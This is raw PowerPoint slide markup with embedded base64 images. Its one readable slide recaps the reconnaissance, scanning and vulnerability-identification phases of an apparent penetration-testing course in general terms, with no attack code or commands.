qjVxFdielop2LlsDeSUypG7Z1a4u2rDQm+bnw51amxFZ9unrMW9hfi2nyvVsbFVGccnVxy+OR++IppiMYFBJIAGpJOgpjiNoqoJZgAONyBVO2/vP0oKR6R8yeLWPwFEYWZPlUUSO1t8+KwjuznT3qv5+VU+Wa9cPLTSbFchqfgKukonH8uR5Op8Rbx5Cl9l7PLt3niewUns/ZzO3aeZ7KumytmiMfPvrG/SiXiH2zMGEUADhUiGpuptXWepMusC2evVNzYak6CkM9WncnYhkfpmHVU2S/N+beC/PwrG6VjRVui27sbI6CJQfW4t+M8fIWHuqbrlEsLV1XI3Z2JUFFFFYaFFFFACWIgDCxHnw14g91ZTvVsA4WS6g9CxOU+yeaH6do8DWt0y2psxJ42R1urCxHyIPIjkaeEurEnDsjFc9Gen28OwXwkmVtUN8j20Ydh7GHMVFZ661k4njDF89JyqGFjXGejPWmEPtDZWmguOzmPA/Sq9Pgyt8vvHMe7lV4JpnisAr8Rr28D50yZOUPopYltx0pVZalsXsQ8rHx0PnURNs4ryK/L4U9kml6KCauumpkY2HAg1yWfsHxosP1rxl/wBhERwjSzN1mPM9nkPrTPaO92UkRAE+0b28tKqsm152XKTceH1pqWc8wPD+9JXpbNUmSWO2m0zZnNzawsAABTCTFgc7nsFcLg2btPyp9hdiMeVviaa2J1it5I4ln7hUns7YpblYfH+1TOC2Kq62ue01LxQAUo+XjwRwGzwgFhUkulIhq9z0rHWBfPRnpDPT3ZGy5MTKI4xrxZj6qr7TH/L1mjVkebA2M2KlCi4Qau3sr+Z4D+1a3s/BLEgVRYAAAdgFNNg7DTDRBEHeSeLNzZvy5VK1yzn2Z2ccOqCiiiplAooooAKKKKACiiigBltTZSTxskihlPEfIg8iO2sm3n3TkwbZtXhJ0e3DsVxyPfwPwrZqTnw6uCGAIIsQRcEHkQeIp4TcSc+NSPn7PRnq+7z+jU6yYTxMJP8A9bH+U+fKs+njZGKupVhoVYEEHvBrrjJS0ccouOxTPRnpvno6SmEsXJpJ4ga56SjpKAEJdnKeIHlTdtjp7Ip/0lGetsWkR3+jJ2UomylHIeVPc9HSUWFITTBgUusYFcZ6OkoNwLhq9z03z0dJWG2OM9GekFJJAAJJ0AAuSewDnV53Z9G8klnxV0TiIxpI34j+oPj4UspKOxoxctEHu/u9LjHsgsgPXkI6q937Tdw+HGtb2HsCPCxhEHeSfWY+0x+nKneCwCRIERQqqLBVFgP87ac1yzm5HZDjUQoooqZUKKKKACiiigAooooAKKKKACiiigDwiovbW7MGLW00YYjgw0dfwuNfdwqVorU6MavZk23PRXNHdsMwlX2Gskg9/qt8PCqVjMLJC2WVGRvZdSp91+NfR1N8XgI5VyyIrr7LqGHkatHma2QlwJ6PnPpKOkrZNo+i3By6qrwn/wBt9P8Ape48rVW8b6GnH6LEqe6SMr/EpPyqy5Ysg+GaM/6SjpKtOI9FWOXgsT/hlt/OFpm/o52gP/LE+EsR/rpu8fsn0n9EF0lHSVOr6OtoH/yxHjLEP66dQei3HtxSNPxTL/Rmo7x+w6S+isdJR0lX3B+huU/pcTGvciM582y1YtneifCR2MnSTH9t8q/9KW+JNK+WKHXDNmRwRs7BUVmY8FVSzHwA1q4bE9GOJmsZrQJ2HrSHwQGw95HhWrYDZMUC5YY0jXsRQt/G3H306AqMuZvReP46WyD2Dufh8ILxpd+cj9aQ+B4KO4WqcAr2iott7OhJLQUUUVhoUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB5XtFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf/Z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124244" y="762000"/>
            <a:ext cx="8867356" cy="5638800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" tIns="0" rIns="45720" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr kumimoji="0"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2"/>
              <a:buNone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Arial"/>
              <a:buNone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1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings 2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1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial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/>
              <a:buNone/>
              <a:defRPr kumimoji="0"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ct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone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None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None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21514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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where are we?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41842" y="1371600"/>
            <a:ext cx="8497358" cy="5029200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Phase 1 provided us with information on our target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Network Ranges, Key systems of interest, Technologies Used,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Insight into potential attack vectors, Insight into potential 	passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phase 2 provided us additional information on our target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Active systems, Ports/Services, Versions of applications running, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Versions of Operating Systems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Phase 3 provided us with known vulnerabilities to the services and systems of our target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Patches that weren’t applied, old versions of software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Insecure services, un-configured services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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